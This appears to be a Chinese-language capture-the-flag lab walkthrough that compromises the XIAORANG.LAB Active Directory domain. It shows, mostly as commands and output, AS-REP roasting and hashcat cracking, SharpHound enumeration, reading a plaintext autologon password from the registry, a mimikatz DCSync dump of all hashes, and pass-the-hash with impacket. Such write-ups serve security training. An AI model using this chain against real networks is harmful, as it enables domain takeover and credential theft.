$krb5asrep$23$zhangxin@XIAORANG.LAB:0eaae5004362e230adf54772de8225df$35bc9e693079d797db4b7820fd7ad48b11bcae7895ac91179beac40e949c6035b67d827360dc66c9d893b1b757ab28d68a8efde201ea89efc369d9a2445de4ed866d3447666fa2318e19ec030b2ac6af434789a38a7872aad04aa56208c5c72d2951ac8032e804814ba44776c51b84f8f8fed45d935eaf7637530fb0b2c31178f12f77e451345febd307bb548c6d27896d2da3196b2a07937634684899ab8adb68c488cf48d6c694bb07f6ee61c5e3b6e59a9ff350f8932b4958dfe7e6777131a1d6c5cf91696de1e1d008684538783f914c6139a8336b7ef7bb186bce14959ee0a32894c29ac2589dd25e23Kerberos AS-REP Roasting 攻击:这是一个针对 Kerberos 认证协议的攻击方法,主要目标是尝试从 Active Directory 获取不需要预身份验证的用户的加密凭证信息。这种攻击可以尝试暴力破解密码,特别是针对没有配置 Kerberos 预身份验证的用户账户。
这样,我们可以视为获取了一个用户清单。接下来,我们可以使用这个username.txt文件来尝试枚举那些未启用预身份验证的账户。通常情况下,预身份验证是默认开启的,但一旦关闭了,攻击者就有可能利用指定的用户名,通过向域控制器的Kerberos 88端口请求票据。在这种情况下,域控制器不会执行任何验证,而是直接返回TGT(Ticket Granting Ticket)和使用用户Hash加密的Login Session Key。攻击者因此可以对获得的用户Hash加密的Login Session Key进行离线破解。如果字典足够强大,就有可能成功破解获得指定用户的明文密码。
hashcat 暴力破解详细教程(附常见案例) | lololowe的博客
gzip -d rockyou.txt.gzhashcat -a 0 -m 18200 --force hash.txt rockyou.txt
$krb5asrep$23$zhangxin@XIAORANG.LAB:c300e2e460c8bf9d6a5c1720f1302e93$6c777af19d5196483195533338ee7480166b30b38c988d2e48fc34566435cab3763d21885d15e2f5baf161562b5158c0b6e82d06aa7892d5a8c477e41f96e1a789845f5e1f5e3af50b50d0aa2220f1df85bce2026fd424a9d642e636cf8321a7eb44cb1da9863a9b53d178916d0b013cbb9bcaf5acb03f8f7a6b82afaf31f72242ef295c9fd99ad621fd615cefb546fe5759b202f5e2a4a955d6b435c23529033953731af7e855ff359069b8efcf2855232d0a3a5b2e23bb549535c97b4a17f1ff7aa581f6826c5fdab2adc743154ff2a55ce6c50cf1d1e26b4e165f8e5c7f9c7548ae6c6af8c2dea0ae8d01:strawberry远程登陆电脑172.22.6.25zhangxin@XIAORANG.LAB(用户名),strawberry(密码)
ps:远程桌面传东西
https://blog.csdn.net/qq_56426046/article/details/126854991
用wsl会因为图形化出问题,还是用vm
./BloodHound --no-sandbox
先弄好bloodhound
C:\Users\zhangxin\Desktop>SharpHound.exe -c all
---------------------------------------------
Initializing SharpHound at 22:11 on 2025/8/11
---------------------------------------------
Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain XIAORANG.LAB using path CN=Schema,CN=Configuration,DC=XIAORANG,DC=LAB
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 20 MB RAM
Status: 132 objects finished (+132 ∞)/s -- Using 29 MB RAM
Enumeration finished in 00:00:00.7194614
Compressing data to .\20250811221146_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 22:11 on 2025/8/11! Happy Graphing!
可以看到,在172.22.6.25这个用户机,运行登录的用户有三个
而yuxuan 用户滥用了SID历史功能(SIDHistory是一个为支持域迁移方案而设置的属性,当一个对象从一个域迁移到另一个域时,会在新域创建一个新的SID作为该对象的objectSid,在之前域中的SID会添加到该对象的sIDHistory属性中,此时该对象将保留在原来域的SID对应的访问权限)
简单来说yuxuan属于域管,所以现在拿到yuxuan的权限然后dump哈希就好了
然后查看一下用户
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
#用于查询系统注册表中与 Windows 登录相关的配置信息
DefaultUserName REG_SZ yuxuan
DefaultPassword REG_SZ Yuxuan7QbrgZ3L
DefaultDomainName REG_SZ xiaorang.lab这样就抓到了yuxuan密码
以发现自动登录用户,正好就是yuxuan,用此用户rdp上去,dump域管哈希
所以我们切换到yuxuan用户,利用这个滥用的SID直接攻击DC机因为我们保留域管理员的访问权限了,所以直接dump哈希
C:\Users\yuxuan\Desktop>mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
500 Administrator 04d93ffd6f5f6e4490e0de23f240a5e9
"lsadump::dcsync /domain:xiaorang.lab /all /csv"
这是 mimikatz 的核心模块和参数:
lsadump::dcsync:调用 DCSync 功能模块。DCSync 是一种利用 Active Directory 域控制器(DC)之间的同步机制(基于 MS-DRSR 协议)来获取用户凭据的技术,无需在域控制器上直接执行代码。/domain:xiaorang.lab:指定目标域为xiaorang.lab(需替换为实际的域名称)。/all:表示获取域内所有用户的凭据信息(包括管理员、普通用户等)。/csv:指定输出格式为 CSV(逗号分隔值),便于后续处理和分析。"exit"
执行完 DCSync 操作后,自动退出 mimikatz 工具,无需手动输入exit。
- 功能:该命令会模拟域控制器的同步请求,从目标域(
xiaorang.lab)的域控制器中提取所有用户的 NTLM 哈希、SID 等信息,这些哈希可用于 Pass-the-Hash(哈希传递)攻击,进而横向移动或提升权限。
拿到hash,直接hash传递即可
proxychains4 /usr/bin/impacket-wmiexec -hashes 00000000000000000000000000000000:04d93ffd6f5f6e4490e0de23f240a5e9 administrator@172.22.6.12
flag{fd60ce54-3cae-440a-afbd-4c5bc0d6a9c5}
proxychains4 impacket-smbexec -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 xiaorang.lab/administrator@172.22.6.25 -codec gbk
